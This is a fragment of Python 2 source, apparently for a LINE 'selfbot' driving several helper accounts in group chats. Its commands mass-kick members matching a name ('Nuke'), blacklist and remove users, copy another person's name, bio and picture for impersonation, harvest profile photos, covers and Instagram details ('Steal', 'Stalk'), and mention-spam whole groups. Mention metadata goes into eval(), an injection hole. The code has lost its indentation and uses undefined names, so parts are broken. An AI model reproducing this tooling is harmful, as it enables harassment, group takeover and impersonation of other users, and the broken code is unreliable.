#if msg.from_ in admin:
cmd = msg.text.replace("Mimic:","")
if cmd == "on":
if mimic["status"] == False:
mimic["status"] = True
cl.sendText(msg.to,"Mimic on")
else:
cl.sendText(msg.to,"Mimic already on")
elif cmd == "off":
if mimic["status"] == True:
mimic["status"] = False
cl.sendText(msg.to,"Mimic off")
else:
cl.sendText(msg.to,"Mimic already off")
elif "Add " in cmd:
target0 = msg.text.replace("Add ","")
target1 = target0.lstrip()
target2 = target1.replace("@","")
target3 = target2.rstrip()
_name = target3
gInfo = cl.getGroup(msg.to)
targets = []
for a in gInfo.members:
if _name == a.displayName:
targets.append(a.mid)
if targets == []:
cl.sendText(msg.to,"No targets")
else:
for target in targets:
try:
mimic["target"][target] = True
cl.sendText(msg.to,"Success added target")
#cl.sendMessageWithMention(msg.to,target)
break
except:
cl.sendText(msg.to,"Failed")
break
elif "Del " in cmd:
target0 = msg.text.replace("Del ","")
target1 = target0.lstrip()
target2 = target1.replace("@","")
target3 = target2.rstrip()
_name = target3
gInfo = cl.getGroup(msg.to)
targets = []
for a in gInfo.members:
if _name == a.displayName:
targets.append(a.mid)
if targets == []:
cl.sendText(msg.to,"No targets")
else:
for target in targets:
try:
del mimic["target"][target]
cl.sendText(msg.to,"Success deleted target")
#cl.sendMessageWithMention(msg.to,target)
break
except:
cl.sendText(msg.to,"Failed!")
break
elif cmd == "Targetlist":
if mimic["target"] == {}:
cl.sendText(msg.to,"No target")
else:
lst = "<<Lit Target>>"
total = len(mimic["target"])
for a in mimic["target"]:
if mimic["target"][a] == True:
stat = "On"
else:
stat = "Off"
lst += "\n->" + cl.getContact(mi_d).displayName + " | " + stat
cl.sendText(msg.to,lst + "\nTotal:" + total)
#-----------------------------------------------
#-----------------------------------------------------------
elif msg.text.lower() == 'respon':
ki.sendText(msg.to,"😂HADIR 🔊")
ki2.sendText(msg.to,"😂HADIR 🔊")
# ki3.sendText(msg.to,"done ✔")
# ki4.sendText(msg.to,"done ✔")
# ki5.sendText(msg.to,"done ✔")
# ki6.sendText(msg.to,"done ✔")
#-----------------------------------------------------------speed
elif msg.text in ["Bl:on"]:
wait["wblacklist"] = True
cl.sendText(msg.to,"Send Contact")
elif msg.text in ["Unbl:on"]:
wait["dblacklist"] = True
cl.sendText(msg.to,"Send Contact")
elif msg.text.lower() == 'mcheck':
if wait["blacklist"] == {}:
cl.sendText(msg.to," Nothing in the blacklist")
else:
cl.sendText(msg.to," following is a blacklist")
mc = ""
for mi_d in wait["blacklist"]:
mc += "�" +cl.getContact(mi_d).displayName + "\n"
cl.sendText(msg.to,mc)
#---------Fungsi Banlist With Tag--------#
elif msg.text in ["Banlist","ip banlist"]:
if wait["blacklist"] == {}:
cl.sendText(msg.to,"No user is Blacklisted")
else:
ki.sendText(msg.to,"Blacklisted user")
mc = " 🛡️=||B L A C K L I S T||=🛡️\n"
for mi_d in wait["blacklist"]:
mc += "🕯️️" +cl.getContact(mi_d).displayName + "\n"
cl.sendText(msg.to,mc)
print "[Command]Banlist executed"
elif msg.text in ["Clearban"]:
if msg.toType == 2:
wait["blacklist"] = {}
cl.sendText(msg.to,"clear all blacklist")
ki.sendText(msg.to,"done ✔")
ki2.sendText(msg.to,"done ✔")
# ki3.sendText(msg.to,"done ✔")
# ki4.sendText(msg.to,"done ✔")
# ki5.sendText(msg.to,"done ✔")
# ki6.sendText(msg.to,"done ✔")
ki.sendText(msg.to,"blacklist done all removed 👮")
elif msg.text.lower() == 'kick@mbl':
if msg.toType == 2:
group = ki.getGroup(msg.to)
gMembMids = [contact.mid for contact in group.members]
matched_list = []
for tag in wait["blacklist"]:
matched_list+=filter(lambda str: str == tag, gMembMids)
if matched_list == []:
ki.sendText(msg.to,"Daftar hitam pengguna tidak memiliki")
return
for jj in matched_list:
try:
cl.kickoutFromGroup(msg.to,[jj])
ki.kickoutFromGroup(msg.to,[jj])
ki2.kickoutFromGroup(msg.to,[jj])
# ki3.kickoutFromGroup(msg.to,[jj])
# ki4.kickoutFromGroup(msg.to,[jj])
# ki5.kickoutFromGroup(msg.to,[jj])
# ki6.kickoutFromGroup(msg.to,[jj])
print (msg.to,[jj])
except:
pass
#-----------------------------------------------
elif "Translate" in msg.text:
cl.sendText(msg.to, "★[TRANSLATE]★\nTr-id ☆to indonesia☆\nTr-en ☆to english☆\nTr-jap ☆to japan☆\nTr-thai ☆to thailand☆\n_______________")
#---------------------------------------------------
#CROT
#---------------------------------------------------
elif "Pict @" in msg.text:
print "[Command]dp executing"
_name = msg.text.replace("Pict @","")
_nametarget = _name.rstrip(' ')
gs = cl.getGroup(msg.to)
targets = []
for g in gs.members:
if _nametarget == g.displayName:
targets.append(g.mid)
if targets == []:
cl.sendText(msg.to,"Contact not found")
else:
for target in targets:
try:
contact = cl.getContact(target)
path = "http://dl.profile.line-cdn.net/" + contact.pictureStatus
cl.sendImageWithURL(msg.to, path)
except:
pass
print "[Command]dp executed"
#---------------------------------------------------
elif msg.text in ["Clear"]:
if msg.toType == 2:
group = cl.getGroup(msg.to)
gMembMids = [contact.mid for contact in group.invitee]
for _mid in gMembMids:
cl.cancelGroupInvitation(msg.to,[_mid])
cl.sendText(msg.to,"I pretended to cancel and canceled.")
#---------------------------------------------------
elif msg.text in ["Mybackup"]:
try:
cl.updateDisplayPicture(mybackup.pictureStatus)
cl.updateProfile(mybackup)
cl.sendText(msg.to, "Backup Sukses Bosqu")
except Exception as e:
cl.sendText(msg.to, str (e))
#-----------------------------------------------------------------------
elif "Youtube " in msg.text:
try:
textToSearch = (msg.text).replace("Youtube ", "").strip()
query = urllib.quote(textToSearch)
url = "https://www.youtube.com/results?search_query=" + query
response = urllib2.urlopen(url)
html = response.read()
soup = BeautifulSoup(html, "html.parser")
results = soup.find(attrs={'class':'yt-uix-tile-link'})
cl.sendText(msg.to,'https://www.youtube.com' + results['href'])
except:
cl.sendText(msg.to,"Could not find it")
#------------------------------------------------
elif "Getinfo" in msg.text:
key = eval(msg.contentMetadata["MENTION"])
key1 = key["MENTIONEES"][0]["M"]
contact = cl.getContact(key1)
cu = cl.channel.getCover(key1)
try:
cl.sendText(msg.to,"~Nama\n" + contact.displayName + "\n~Mid\n" + contact.mid + "\n~Bio\n" + contact.statusMessage + "\n~Profile Picture\nhttp://dl.profile.line-cdn.net/" + contact.pictureStatus + "\n~Header\n" + str(cu))
except:
cl.sendText(msg.to,"~Nama\n" + contact.displayName + "\n~Mid\n" + contact.mid + "\n~Bio\n" + contact.statusMessage + "\n~Profile Picture\n" + str(cu))
elif "Getbio" in msg.text:
key = eval(msg.contentMetadata["MENTION"])
key1 = key["MENTIONEES"][0]["M"]
contact = cl.getContact(key1)
cu = cl.channel.getCover(key1)
try:
cl.sendText(msg.to,contact.statusMessage)
except:
cl.sendText(msg.to,contact.statusMessage)
elif "Gimage" in msg.text:
group = cl.getGroup(msg.to)
path = "http://dl.profile.line-cdn.net/" + group.pictureStatus
cl.sendImageWithURL(msg.to,path)
elif "Getprofile @" in msg.text:
print "[Command]dp executing"
_name = msg.text.replace("Getprofile @","")
_nametarget = _name.rstrip(' ')
gs = cl.getGroup(msg.to)
targets = []
for g in gs.members:
if _nametarget == g.displayName:
targets.append(g.mid)
if targets == []:
cl.sendText(msg.to,"Contact not found")
else:
for target in targets:
try:
contact = cl.getContact(target)
path = "http://dl.profile.line-cdn.net/" + contact.pictureStatus
cl.sendImageWithURL(msg.to, path)
except:
pass
print "[Command]dp executed"
#-----------------------------------------------------------------#
elif "Getcover @" in msg.text:
print "[Command]cover executing"
_name = msg.text.replace("Getcover @","")
_nametarget = _name.rstrip(' ')
gs = cl.getGroup(msg.to)
targets = []
for g in gs.members:
if _nametarget == g.displayName:
targets.append(g.mid)
if targets == []:
cl.sendText(msg.to,"Contact not found")
else:
for target in targets:
try:
contact = cl.getContact(target)
cu = cl.channel.getCover(target)
path = str(cu)
cl.sendImageWithURL(msg.to, path)
except Exception as e:
print e
elif "Backup" in msg.text:
#if msg.from_ in admin:
try:
h = open('mydn.txt',"r")
name = h.read()
h.close()
x = name
profile = cl.getProfile()
profile.displayName = x
cl.updateProfile(profile)
i = open('mysm.txt',"r")
sm = i.read()
i.close()
y = sm
cak = cl.getProfile()
cak.statusMessage = y
cl.updateProfile(cak)
j = open('myps.txt',"r")
ps = j.read()
j.close()
p = ps
cl.updateProfilePicture(p)
cl.sendText(msg.to, "Succes")
except Exception as e:
cl.sendText(msg.to,"Gagagl!")
print e
#----------------------------
elif "Copy " in msg.text:
#if msg.from_ in admin:
targets = []
key = eval(msg.contentMetadata["MENTION"])
key["MENTIONEES"][0]["M"]
for x in key["MENTIONEES"]:
targets.append(x["M"])
for target in targets:
try:
contact = cl.getContact(target)
X = contact.displayName
profile = cl.getProfile()
profile.displayName = X
cl.updateProfile(profile)
cl.sendText(msg.to, "Success...")
#---------------------------------------
Y = contact.statusMessage
lol = cl.getProfile()
lol.statusMessage = Y
cl.updateProfile(lol)
#---------------------------------------
P = contact.pictureStatus
cl.updateProfilePicture(P)
except Exception as e:
cl.sendText(msg.to, "Failed!")
#-----------------------------------------------
elif "Stalk " in msg.text:
print "[Command]Stalk executing"
stalkID = msg.text.replace("Stalk ","")
subprocess.call(["instaLooter",stalkID,"tmp/","-n","1"])
files = glob.glob("tmp/*.jpg")
for file in files:
os.rename(file,"tmp/tmp.jpg")
fileTmp = glob.glob("tmp/tmp.jpg")
if not fileTmp:
cl.sendText(msg.to, "Image not found, maybe the account haven't post a single picture or the account is private")
print "[Command]Stalk executed - no image found"
else:
image = upload_tempimage(client)
cl.sendText(msg.to, format(image['link']))
subprocess.call(["sudo","rm","-rf","tmp/tmp.jpg"])
print "[Command]Stalk executed - succes"
#------------------------------------------------------------
elif msg.text in ["Invite"]:
wait["invite"] = True
random.choice(KAC).sendText(msg.to,"send contact 😉")
#------------------------------------------------------------
elif "Cover @" in msg.text:
# if msg.from_ in admin:
salsa = msg.text.replace("Cover @","")
Manis = cl.getContact(salsa)
Imoet = "http://dl.profile.line-cdn.net/" + contact.pictureStatus
try:
cover = cl.channel.getCover(Manis)
except:
cover = ""
cl.sendText(msg.to,"Gambar Foto Profilenya")
cl.sendImageWithURL(msg.to,Imoet)
if cover == "":
cl.sendText(msg.to,"User tidak memiliki cover atau sejenisnya")
else:
cl.sendText(msg.to,"Gambar Covernya")
cl.sendImageWithURL(msg.to,cover)
#-----------------------------------------------
elif "Steal " in msg.text:
#if msg.from_ in admin:
salsa = msg.text.replace("Steal ","")
Manis = cl.getContact(salsa)
Imoet = "http://dl.profile.line-cdn.net/" + contact.pictureStatus
try:
cover = cl.channel.getCover(Manis)
except:
cover = ""
cl.sendText(msg.to,"Gambar Foto Profilenya")
cl.sendImageWithURL(msg.to,Imoet)
if cover == "":
cl.sendText(msg.to,"User tidak memiliki cover atau sejenisnya")
else:
cl.sendText(msg.to,"Gambar Covernya")
cl.sendImageWithURL(msg.to,cover)
#-----------------------------------------------
#----------------------------------------------
elif "Steal @" in msg.text:
# if msg.from_ in admin:
if msg.toType == 2:
steal = msg.text.replace("Steal @","")
stealname = steal.rstrip(" ")
group = cl.getGroup(msg.to)
targets = []
if steal == "":
cl.sendText(msg.to,"Invalid user")
else:
for i in group.members:
if stealname == i.displayName:
targets.append(i.mid)
if targets == []:
cl.sendText(msg.to,"User tidak ditemukan")
else:
for target in targets:
try:
contact = cl.getContact(target)
image = "http://dl.profile.line-cdn.net/" + contact.pictureStatus
try:
cover = cl.channel.getCover(contact)
except:
cover = ""
try:
cl.sendText(msg.to,"Gambar Foto Profilenya")
cl.sendImageWithURL(msg.to,image)
if cover == "":
cl.sendText(msg.to,"User tidak memiliki cover atau sejenisnya")
else:
cl.sendText(msg.to,"Gambar Covernya")
cl.sendImageWithURL(msg.to,cover)
except Exception as error:
cl.sendText(msg.to,(error))
break
except:
cl.sendText(msg.to,"Error!")
break
else:
cl.sendText(msg.to,"Tidak bisa dilakukan di luar wilayah")
elif "Gift @" in msg.text:
_name = msg.text.replace("Gift @","")
_nametarget = _name.rstrip(' ')
gs = cl.getGroup(msg.to)
for g in gs.members:
if _nametarget == g.displayName:
msg.contentType = 9
msg.contentMetadata={'PRDID': '89131c1a-e549-4bd5-9e60-e24de0d2e252',
'PRDTYPE': 'THEME',
'MSGTPL': '10'}
msg.text = None
cl.sendMessage(msg,g)
ki.sendMessage(msg,g)
ki2.sendMessage(msg,g)
# ki3.sendMessage(msg,g)
# ki4.sendMessage(msg,g)
# ki5.sendMessage(msg,g)
# ki6.sendMessage(msg,g)
# ki7.sendMessage(msg,g)
# ki8.sendMessage(msg,g)
# ki9.sendMessage(msg,g)
elif 'ig ' in msg.text.lower():
#if msg.from_ in admin:
try:
instagram = msg.text.lower().replace("ig ","")
html = requests.get('https://www.instagram.com/' + instagram + '/?')
soup = BeautifulSoup(html.text, 'html5lib')
data = soup.find_all('meta', attrs={'property':'og:description'})
text = data[0].get('content').split()
data1 = soup.find_all('meta', attrs={'property':'og:image'})
text1 = data1[0].get('content').split()
user = "Name: " + text[-2] + "\n"
user1 = "Username: " + text[-1] + "\n"
followers = "Followers: " + text[0] + "\n"
following = "Following: " + text[2] + "\n"
post = "Post: " + text[4] + "\n"
link = "Link: " + "https://www.instagram.com/" + instagram
detail = "======INSTAGRAM INFO USER======\n"
details = "\n======INSTAGRAM INFO USER======"
cl.sendText(msg.to, detail + user + user1 + followers + following + post + link + details)
cl.sendImageWithURL(msg.to, text1[0])
except Exception as njer:
cl.sendText(msg.to, str(njer))
elif 'audio: ' in msg.text.lower():
#if msg.from_ in admin:
try:
songname = msg.text.lower().replace('audio: ','')
params = {'songname': songname}
r = requests.get('http://ide.fdlrcn.com/workspace/yumi-apis/joox?' + urllib.urlencode(params))
data = r.text
data = json.loads(data)
for song in data:
hasil = 'This is Your Music\n'
hasil += 'Judul : ' + song[0]
hasil += '\nDurasi : ' + song[1]
hasil += '\nLink Download : ' + song[4]
cl.sendText(msg.to, hasil)
cl.sendText(msg.to, "Please Wait for audio...")
cl.sendAudioWithURL(msg.to, song[3])
except Exception as njer:
cl.sendText(msg.to, str(njer))
elif msg.text.lower() == 'reboot':
print "[Command]Like executed"
try:
cl.sendText(msg.to,"Restarting...")
restart_program()
except:
cl.sendText(msg.to,"Please wait")
restart_program()
pass
elif 'record' in msg.text:
psn = msg.text.replace("record ","")
tts = gTTS(psn, lang='id', slow=False)
tts.save('tts.mp3')
cl.sendAudio(msg.to, 'tts.mp3')
elif "Mp3 " in msg.text:
say = msg.text.replace("Mp3 ","")
lang = 'id'
tts = gTTS(text=say, lang=lang)
tts.save("hasil.mp3")
cl.sendAudio(msg.to,"hasil.mp3")
#==================================================
elif 'lirik ' in msg.text.lower():
# if msg.from_ in admin:
try:
songname = msg.text.lower().replace('lirik ','')
params = {'songname': songname}
r = requests.get('http://ide.fdlrcn.com/workspace/yumi-apis/joox?' + urllib.urlencode(params))
data = r.text
data = json.loads(data)
for song in data:
hasil = 'Lyric Lagu ('
hasil += song[0]
hasil += ')\n\n'
hasil += song[5]
cl.sendText(msg.to, hasil)
except Exception as wak:
cl.sendText(msg.to, str(wak))
#---------------------- = NUKE = ------------------
elif 'Nuke' in msg.text:
if msg.toType == 2:
print "Nuke ok"
_name = msg.text.replace("Nuke","")
gs = cl.getGroup(msg.to)
gs = ki.getGroup(msg.to)
gs = ki2.getGroup(msg.to)
# gs = ki3.getGroup(msg.to)
# gs = ki4.getGroup(msg.to)
# gs = ki5.getGroup(msg.to)
# gs = ki6.getGroup(msg.to)
#start = time.time()
# ki.sendText(msg.to, "Nuke Speed")
# elapsed_time = time.time() - start
# ki2.sendText(msg.to, "%sseconds" % (elapsed_time))
# ki3.sendText(msg.to, "Nuke Start")
#ki4.sendText(msg.to, "Nuke Proses")
#ki5.sendText(msg.to," Sikaatt all..")
targets = []
for g in gs.members:
if _name in g.displayName:
targets.append(g.mid)
if targets == []:
cl.sendText(msg.to,"Not found.")
# ki.sendText(msg.to,"Not found.")
else:
for target in targets:
if not target in Bots:
try:
klist=[cl,ki,ki2]
kicker=random.choice(klist)
kicker.kickoutFromGroup(msg.to,[target])
print (msg.to,[g.mid])
except:
pass
# ki3.sendText(msg,to,"Nuke Finish")
# ki2.sendText(msg,to,"
#-------------------------------------------------------------
elif msg.text in ["Tag","Tagall"]:
#if msg.from_ in admin:
group = cl.getGroup(msg.to)
k = len(group.members)//100
for j in xrange(k+1):
msg = Message(to=msg.to)
txt = u''
s=0
d=[]
for i in group.members[j*100 : (j+1)*100]:
d.append({"S":str(s), "E" :str(s+8), "M":i.mid})
s += 9
txt += u'@Krampus\n'
msg.text = txt
msg.contentMetadata = {u'MENTION':json.dumps({"MENTIONEES":d})}
cl.sendMessage(msg)
#-------------------FUNGSI TAGALL---------------#
elif msg.text.lower() == 'cancel':
if msg.toType == 2:
group = cl.getGroup(msg.to)
gMembMids = [contact.mid for contact in group.invitee]
for _mid in gMembMids:
cl.cancelGroupInvitation(msg.to,[_mid])
cl.sendText(msg.to,"I pretended to cancel and canceled👈")
elif "Album" in msg.text:
try:
albumtags = msg.text.replace("Album","")
gid = albumtags[:33]
name = albumtags.replace(albumtags[:34],"")
cl.createAlbum(gid,name)
cl.sendText(msg.to,name + "We created an album👈")
except:
cl.sendText(msg.to,"Error")
elif "fakec→" in msg.text:
try:
source_str = 'abcdefghijklmnopqrstuvwxyz1234567890@:;./_][!&%$#)(=~^|'
name = "".join([random.choice(source_str) for x in xrange(10)])
amid = msg.text.replace("fakec→","")
cl.sendText(msg.to,str(cl.channel.createAlbumF(msg.to,name,amid)))
except Exception as e:
try:
cl.sendText(msg.to,str(e))
except:
pass
#-----------------------------------------------
elif "join: " in msg.text.lower():
rplace=msg.text.lower().replace("join: ")
if rplace == "on":
wait["atjointicket"]=True
elif rplace == "off":
wait["atjointicket"]=False
cl.sendText(msg.to,"Auto Join Group by Ticket is %s" % str(wait["atjointicket"]))
elif '/ti/g/' in msg.text.lower():
link_re = re.compile('(?:line\:\/|line\.me\/R)\/ti\/g\/([a-zA-Z0-9_-]+)?')
links = link_re.findall(msg.text)
n_links=[]
for l in links:
if l not in n_links:
n_links.append(l)
for ticket_id in n_links:
if wait["atjointicket"] == True:
group=cl.findGroupByTicket(ticket_id)
cl.acceptGroupInvitationByTicket(group.id,ticket_id)
cl.sendText(msg.to,"Sukses join ke grup %s" % str(group.name))
#-----------------------------------------------
elif msg.text in ["Sp","Speed","speed"]:
# start = time.time()
cl.sendText(msg.to, "0.021980063087 secound","0.026850063087 secound","0.0209760063087 secound")
#-----------------------------------------------
elif msg.text.lower() == 'freak in':
G = cl.getGroup(msg.to)
ginfo = cl.getGroup(msg.to)
G.preventJoinByTicket = False
cl.updateGroup(G)
invsend = 0
Ticket = cl.reissueGroupTicket(msg.to)
ki.acceptGroupInvitationByTicket(msg.to,Ticket)
time.sleep(0.01)
ki2.acceptGroupInvitationByTicket(msg.to,Ticket)
time.sleep(0.01)
# ki3.acceptGroupInvitationByTicket(msg.to,Ticket)
# time.sleep(0.01)
# ki4.acceptGroupInvitationByTicket(msg.to,Ticket)
# time.sleep(0.01)
# ki5.acceptGroupInvitationByTicket(msg.to,Ticket)
# time.sleep(0.01)
# ki6.acceptGroupInvitationByTicket(msg.to,Ticket)
# time.sleep(0.01)
G = cl.getGroup(msg.to)
ginfo = cl.getGroup(msg.to)
G.preventJoinByTicket = True
random.choice(KAC).updateGroup(G)
print "kicker ok"
G.preventJoinByTicket(G)
random.choice(KAC).updateGroup(G)
#-----------------------------------------------
elif msg.text.lower() == 'reinvite':
if msg.toType == 2:
G = cl.getGroup(msg.to)
ginfo = cl.getGroup(msg.to)
cl.sendText(msg.to,"waitting...")
ki.leaveGroup(msg.to)
ki2.leaveGroup(msg.to)
# ki3.leaveGroup(msg.to)
# ki4.leaveGroup(msg.to)
# ki5.leaveGroup(msg.to)
# ki6.leaveGroup(msg.to)
G.preventJoinByTicket = False
cl.updateGroup(G)
invsend = 0
Ticket = cl.reissueGroupTicket(msg.to)
ki.acceptGroupInvitationByTicket(msg.to,Ticket)
ki2.acceptGroupInvitationByTicket(msg.to,Ticket)
# ki3.acceptGroupInvitationByTicket(msg.to,Ticket)
# ki4.acceptGroupInvitationByTicket(msg.to,Ticket)
# ki5.acceptGroupInvitationByTicket(msg.to,Ticket)
# ki6.acceptGroupInvitationByTicket(msg.to,Ticket)
G = cl.getGroup(msg.to)
ginfo = cl.getGroup(msg.to)
G.preventJoinByTicket = True
ki.updateGroup(G)
print "kicker ok"
G.preventJoinByTicket(G)
ki.updateGroup(G)
#-----------------------------------------------
elif "B1 in" in msg.text:
G = cl.getGroup(msg.to)
ginfo = cl.getGroup(msg.to)
G.preventJoinByTicket = False
cl.updateGroup(G)
invsend = 0
Ticket = cl.reissueGroupTicket(msg.to)
ki.acceptGroupInvitationByTicket(msg.to,Ticket)
G = cl.getGroup(msg.to)
ginfo = cl.getGroup(msg.to)
G.preventJoinByTicket = True
ki.updateGroup(G)
print "kicker ok"
G.preventJoinByTicket(G)
ki.updateGroup(G)
#-----------------------------------------------
elif "B2 in" in msg.text:
G = cl.getGroup(msg.to)
ginfo = cl.getGroup(msg.to)
G.preventJoinByTicket = False
cl.updateGroup(G)
invsend = 0
Ticket = cl.reissueGroupTicket(msg.to)
ki2.acceptGroupInvitationByTicket(msg.to,Ticket)
G = cl.getGroup(msg.to)
ginfo = cl.getGroup(msg.to)
G.preventJoinByTicket = True
ki2.updateGroup(G)
print "kicker ok"
G.preventJoinByTicket(G)
ki2.updateGroup(G)
#-----------------------------------------------
elif "B3 in" in msg.text:
G = cl.getGroup(msg.to)
ginfo = cl.getGroup(msg.to)
G.preventJoinByTicket = False
cl.updateGroup(G)
invsend = 0
Ticket = cl.reissueGroupTicket(msg.to)
ki3.acceptGroupInvitationByTicket(msg.to,Ticket)
G = cl.getGroup(msg.to)
ginfo = cl.getGroup(msg.to)
G.preventJoinByTicket = True
ki2.updateGroup(G)
print "kicker ok"
G.preventJoinByTicket(G)
ki2.updateGroup(G)
#-----------------------------------------------
elif "B4 in" in msg.text:
G = cl.getGroup(msg.to)
ginfo = cl.getGroup(msg.to)
G.preventJoinByTicket = False
cl.updateGroup(G)
invsend = 0
Ticket = cl.reissueGroupTicket(msg.to)
ki4.acceptGroupInvitationByTicket(msg.to,Ticket)
G = cl.getGroup(msg.to)
ginfo = cl.getGroup(msg.to)
G.preventJoinByTicket = True
ki3.updateGroup(G)
print "kicker ok"
G.preventJoinByTicket(G)
ki3.updateGroup(G)
#-----------------------------------------------
elif "B5 in" in msg.text:
G = cl.getGroup(msg.to)
ginfo = cl.getGroup(msg.to)
G.preventJoinByTicket = False
cl.updateGroup(G)
invsend = 0
Ticket = cl.reissueGroupTicket(msg.to)
ki5.acceptGroupInvitationByTicket(msg.to,Ticket)
G = cl.getGroup(msg.to)
ginfo = cl.getGroup(msg.to)
G.preventJoinByTicket = True
ki5.updateGroup(G)
print "kicker ok"
G.preventJoinByTicket(G)
ki5.updateGroup(G)
#-----------------------------------------------
elif "B6 in" in msg.text:
G = cl.getGroup(msg.to)
ginfo = cl.getGroup(msg.to)
G.preventJoinByTicket = False
cl.updateGroup(G)
invsend = 0
Ticket = cl.reissueGroupTicket(msg.to)
ki6.acceptGroupInvitationByTicket(msg.to,Ticket)
G = cl.getGroup(msg.to)
ginfo = cl.getGroup(msg.to)
G.preventJoinByTicket = True
ki6.updateGroup(G)
print "kicker ok"
G.preventJoinByTicket(G)
ki6.updateGroup(G)
#-----------------------------------------------
elif "B7 in" in msg.text:
G = cl.getGroup(msg.to)
ginfo = cl.getGroup(msg.to)
G.preventJoinByTicket = False
cl.updateGroup(G)
invsend = 0
Ticket = cl.reissueGroupTicket(msg.to)
ki7.acceptGroupInvitationByTicket(msg.to,Ticket)
G = cl.getGroup(msg.to)
ginfo = cl.getGroup(msg.to)
G.preventJoinByTicket = True
ki7.updateGroup(G)
print "kicker ok"
G.preventJoinByTicket(G)
ki7.updateGroup(G)
#-----------------------------------------------
elif "B8 in" in msg.text:
G = cl.getGroup(msg.to)
ginfo = cl.getGroup(msg.to)
G.preventJoinByTicket = False
cl.updateGroup(G)
invsend = 0
Ticket = cl.reissueGroupTicket(msg.to)
ki8.acceptGroupInvitationByTicket(msg.to,Ticket)
G = cl.getGroup(msg.to)
ginfo = cl.getGroup(msg.to)
G.preventJoinByTicket = True
ki8.updateGroup(G)
print "kicker ok"
G.preventJoinByTicket(G)
ki8.updateGroup(G)
#-----------------------------------------------
elif "B9 in" in msg.text:
G = cl.getGroup(msg.to)
ginfo = cl.getGroup(msg.to)
G.preventJoinByTicket = False
cl.updateGroup(G)
invsend = 0
Ticket = cl.reissueGroupTicket(msg.to)
ki9.acceptGroupInvitationByTicket(msg.to,Ticket)
G = cl.getGroup(msg.to)
ginfo = cl.getGroup(msg.to)
G.preventJoinByTicket = True
ki9.updateGroup(G)
print "kicker ok"
G.preventJoinByTicket(G)
ki9.updateGroup(G)
#-----------------------------------------------
elif "B10 in" in msg.text:
G = cl.getGroup(msg.to)
ginfo = cl.getGroup(msg.to)
G.preventJoinByTicket = False
cl.updateGroup(G)
invsend = 0
Ticket = cl.reissueGroupTicket(msg.to)
ki10.acceptGroupInvitationByTicket(msg.to,Ticket)
G = cl.getGroup(msg.to)
ginfo = cl.getGroup(msg.to)
G.preventJoinByTicket = True
ki10.updateGroup(G)
print "kicker ok"
G.preventJoinByTicket(G)
ki10.updateGroup(G)
#------------------------------------------------------------------
elif "B11 in" in msg.text:
G = cl.getGroup(msg.to)
ginfo = cl.getGroup(msg.to)
G.preventJoinByTicket = False
cl.updateGroup(G)
invsend = 0
Ticket = cl.reissueGroupTicket(msg.to)
ki11.acceptGroupInvitationByTicket(msg.to,Ticket)
G = cl.getGroup(msg.to)
ginfo = cl.getGroup(msg.to)
G.preventJoinByTicket = True
ki11.updateGroup(G)
print "kicker ok"
G.preventJoinByTicket(G)
ki11.updateGroup(G)
#-----------------------------------------------
elif "B12 in" in msg.text:
G = cl.getGroup(msg.to)
ginfo = cl.getGroup(msg.to)
G.preventJoinByTicket = False
cl.updateGroup(G)
invsend = 0
Ticket = cl.reissueGroupTicket(msg.to)
ki12.acceptGroupInvitationByTicket(msg.to,Ticket)
G = cl.getGroup(msg.to)
ginfo = cl.getGroup(msg.to)
G.preventJoinByTicket = True
ki12.updateGroup(G)
print "kicker ok"
G.preventJoinByTicket(G)
ki12.updateGroup(G)
#-----------------------------------------------
elif "B13 in" in msg.text:
G = cl.getGroup(msg.to)
ginfo = cl.getGroup(msg.to)
G.preventJoinByTicket = False
cl.updateGroup(G)
invsend = 0
Ticket = cl.reissueGroupTicket(msg.to)
ki13.acceptGroupInvitationByTicket(msg.to,Ticket)
G = cl.getGroup(msg.to)
ginfo = cl.getGroup(msg.to)
G.preventJoinByTicket = True
ki13.updateGroup(G)
print "kicker ok"
G.preventJoinByTicket(G)
ki13.updateGroup(G)
#-----------------------------------------------
elif "B14 in" in msg.text:
G = cl.getGroup(msg.to)
ginfo = cl.getGroup(msg.to)
G.preventJoinByTicket = False
cl.updateGroup(G)
invsend = 0
Ticket = cl.reissueGroupTicket(msg.to)
ki14.acceptGroupInvitationByTicket(msg.to,Ticket)
G = cl.getGroup(msg.to)
ginfo = cl.getGroup(msg.to)
G.preventJoinByTicket = True
ki14.updateGroup(G)
print "kicker ok"
G.preventJoinByTicket(G)
ki14.updateGroup(G)
#-----------------------------------------------
elif "B15 in" in msg.text:
G = cl.getGroup(msg.to)
ginfo = cl.getGroup(msg.to)
G.preventJoinByTicket = False
cl.updateGroup(G)
invsend = 0
Ticket = cl.reissueGroupTicket(msg.to)
ki15.acceptGroupInvitationByTicket(msg.to,Ticket)
G = cl.getGroup(msg.to)
ginfo = cl.getGroup(msg.to)
G.preventJoinByTicket = True
ki15.updateGroup(G)
print "kicker ok"
G.preventJoinByTicket(G)
ki15.updateGroup(G)
#-----------------------------------------------
elif "B16 in" in msg.text:
G = cl.getGroup(msg.to)
ginfo = cl.getGroup(msg.to)
G.preventJoinByTicket = False
cl.updateGroup(G)
invsend = 0
Ticket = cl.reissueGroupTicket(msg.to)
ki16.acceptGroupInvitationByTicket(msg.to,Ticket)
G = cl.getGroup(msg.to)
ginfo = cl.getGroup(msg.to)
G.preventJoinByTicket = True
ki16.updateGroup(G)
print "kicker ok"
G.preventJoinByTicket(G)
ki16.updateGroup(G)
#-----------------------------------------------
elif "B17 in" in msg.text:
G = cl.getGroup(msg.to)
ginfo = cl.getGroup(msg.to)
G.preventJoinByTicket = False
cl.updateGroup(G)
invsend = 0
Ticket = cl.reissueGroupTicket(msg.to)
ki17.acceptGroupInvitationByTicket(msg.to,Ticket)
G = cl.getGroup(msg.to)
ginfo = cl.getGroup(msg.to)
G.preventJoinByTicket = True
ki17.updateGroup(G)
print "kicker ok"
G.preventJoinByTicket(G)
ki17.updateGroup(G)
#-----------------------------------------------
elif "B18 in" in msg.text:
G = cl.getGroup(msg.to)
ginfo = cl.getGroup(msg.to)
G.preventJoinByTicket = False
cl.updateGroup(G)
invsend = 0
Ticket = cl.reissueGroupTicket(msg.to)
ki18.acceptGroupInvitationByTicket(msg.to,Ticket)
G = cl.getGroup(msg.to)
ginfo = cl.getGroup(msg.to)
G.preventJoinByTicket = True
ki18.updateGroup(G)
print "kicker ok"
G.preventJoinByTicket(G)
ki18.updateGroup(G)
#-----------------------------------------------
elif msg.text.lower() == 'freak out':
if msg.toType == 2:
ginfo = cl.getGroup(msg.to)
try:
# cl.sendText(msg.to,"Bye Bye😘 " + str(ginfo.name) + "")
ki.leaveGroup(msg.to)
ki2.leaveGroup(msg.to)
# ki3.leaveGroup(msg.to)
# ki4.leaveGroup(msg.to)
# ki5.leaveGroup(msg.to)
